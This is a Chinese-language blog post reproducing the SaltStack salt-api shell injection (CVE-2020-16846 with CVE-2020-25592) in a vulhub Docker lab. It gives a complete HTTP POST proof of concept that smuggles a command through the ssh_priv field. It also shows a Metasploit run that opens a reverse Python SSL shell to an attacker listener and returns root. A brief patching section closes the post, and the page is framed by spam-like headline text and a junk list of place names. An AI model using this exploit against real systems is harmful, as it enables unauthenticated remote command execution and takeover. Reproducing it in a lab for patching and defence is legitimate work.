91超碰碰碰碰久久久久久综合_超碰av人澡人澡人澡人澡人掠_国产黄大片在线观看画质优化_txt小说免费全本

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

SaltStack Shell注入漏洞CVE-2020-16846怎么理解

發布時間:2021-12-28 18:01:27 來源:億速云 閱讀:150 作者:柒染 欄目:安全技術

這篇文章將為大家詳細講解有關SaltStack Shell注入漏洞CVE-2020-16846怎么理解,文章內容質量較高,因此小編分享給大家做個參考,希望大家閱讀完這篇文章后對相關知識有一定的了解。

SaltStack Shell 注入 (CVE-2020-16846)漏洞復現

一、漏洞簡介

SaltStack是一個分布式運維系統,在互聯網場景中被廣泛應用,有以下兩=個主要功能:

?     配置管理系統,能夠將遠程節點維護在一個預定義的狀態

?     分布式遠程執行系統,用于在遠程節點上單獨或通過任意選擇標準來執行命令和查詢數據

CVE-2020-16846和CVE-2020-25592組合使用可在未授權的情況下通過salt-api接口執行任意命令。CVE-2020-25592允許任意用戶調用SSH模塊,CVE-2020-16846允許用戶執行任意命令。salt-api雖不是默認開啟配置,但絕大多數SaltStack用戶會選擇開啟salt-api,故存在較高風險。

二、環境搭建

下載環境:

https://github.com/vulhub/vulhub/tree/master/saltstack/CVE-2020-16846

SaltStack Shell注入漏洞CVE-2020-16846怎么理解

或者后臺回復:CVE-2020-16846下載環境

環境啟動:docker-compose up -d

SaltStack Shell注入漏洞CVE-2020-16846怎么理解

訪問地址:https://192.168.1.107:8000/

SaltStack Shell注入漏洞CVE-2020-16846怎么理解

三、漏洞復現

POC

POST /run HTTP/1.1Host: 192.168.1.107:8000User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:68.0) Gecko/20100101 Firefox/68.0Accept: application/x-yamlAccept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateDNT: 1Connection: closeUpgrade-Insecure-Requests: 1Content-Type: application/x-www-form-urlencodedContent-Length: 91token=12312&client=ssh&tgt=*&fun=a&roster=whip1ash&ssh_priv=aaa|touch%20/tmp/success%3b

執行poc

SaltStack Shell注入漏洞CVE-2020-16846怎么理解

touch文件成功

SaltStack Shell注入漏洞CVE-2020-16846怎么理解

msf里面有exp

SaltStack Shell注入漏洞CVE-2020-16846怎么理解

exploit/linux/http/saltstack_salt_api_cmd_exec

use exploit/linux/http/saltstack_salt_api_cmd_execmsf6 exploit(linux/http/saltstack_salt_api_cmd_exec) > set rhosts 192.168.1.107rhosts => 192.168.1.107msf6 exploit(linux/http/saltstack_salt_api_cmd_exec) > set rport 8000rport => 8000msf6 exploit(linux/http/saltstack_salt_api_cmd_exec) > set LhOST 192.168.1.117LhOST => 192.168.1.117msf6 exploit(linux/http/saltstack_salt_api_cmd_exec) > set LPORT 4444LPORT => 4444msf6 exploit(linux/http/saltstack_salt_api_cmd_exec) > show options Module options (exploit/linux/http/saltstack_salt_api_cmd_exec):   Name       Current Setting  Required  Description   ----       ---------------  --------  -----------   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]   RHOSTS     192.168.1.107    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:'   RPORT      8000             yes       The target port (TCP)   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.   SRVPORT    8080             yes       The local port to listen on.   SSL        true             no        Negotiate SSL/TLS for outgoing connections   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)   TARGETURI  /                yes       Base path   URIPATH                     no        The URI to use for this exploit (default is random)   VHOST                       no        HTTP server virtual hostPayload options (cmd/unix/reverse_python_ssl):   Name   Current Setting  Required  Description   ----   ---------------  --------  -----------   LHOST  192.168.1.117    yes       The listen address (an interface may be specified)   LPORT  4444             yes       The listen portExploit target:   Id  Name   --  ----   0   Unix Commandmsf6 exploit(linux/http/saltstack_salt_api_cmd_exec) > exploit [*] Started reverse SSL handler on 192.168.1.117:4444 [*] Executing automatic check (disable AutoCheck to override)[+] The target is vulnerable. Auth bypass successful.[*] Executing Unix Command for cmd/unix/reverse_python_ssl[*] Command shell session 2 opened (192.168.1.117:4444 -> 192.168.1.107:50332) at 2020-12-21 22:34:40 +0800iduid=0(root) gid=0(root) groups=0(root)

四、漏洞修復

1. 盡快修復。由于官方并未放出升級包,故目前仍需要手動進行修復,這里是官方安全通告和修復補丁。

2. 如非必須使用salt-api,請關閉該功能。

關于SaltStack Shell注入漏洞CVE-2020-16846怎么理解就分享到這里了,希望以上內容可以對大家有一定的幫助,可以學到更多知識。如果覺得文章不錯,可以把它分享出去讓更多的人看到。

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

门头沟区| 讷河市| 红桥区| 新野县| 安阳县| 桐柏县| 葫芦岛市| 大港区| 达州市| 马鞍山市| 蛟河市| 周口市| 房产| 汝州市| 阳朔县| 龙胜| 土默特左旗| 南江县| 修文县| 安塞县| 武山县| 苏尼特右旗| 安新县| 西乌珠穆沁旗| 甘肃省| 金溪县| 射阳县| 边坝县| 隆德县| 错那县| 太湖县| 台北市| 游戏| 巧家县| 夏邑县| 塘沽区| 雷山县| 昆明市| 昌图县| 贵阳市| 肃宁县|